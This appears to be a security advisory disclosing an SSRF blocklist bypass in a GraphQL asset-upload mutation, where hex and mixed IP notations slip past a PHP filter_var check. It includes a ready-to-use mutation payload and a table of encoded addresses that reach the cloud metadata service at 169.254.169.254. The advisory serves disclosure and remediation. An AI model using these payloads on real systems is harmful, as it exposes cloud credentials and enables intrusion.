I observed a recent commit intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory.
The saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services.
mutation {
save_images_Asset(_file: {
url: "http://169.254.0xa9fe/latest/meta-data/"
filename: "metadata.txt"
}) {
id
}
}
169.254.0xa9fe to 169.254.169.254| Payload | Notation | Resolves To |
|---|---|---|
http://169.254.0xa9fe/ |
Mixed (decimal + hex) | 169.254.169.254 |
http://0xa9.0xfe.0xa9.0xfe/ |
Full hex dotted | 169.254.169.254 |
http://0xa9fea9fe/ |
Single hex integer | 169.254.169.254 |
File: src/gql/resolvers/mutations/Asset.php
Root Cause: filter_var($hostname, FILTER_VALIDATE_IP) only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them.
// Line 287 - Fails to catch hex notation
filter_var($hostname, FILTER_VALIDATE_IP)
{
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-09T20:35:35Z",
"nvd_published_at": "2026-02-09T20:15:57Z",
"severity": "MODERATE"
}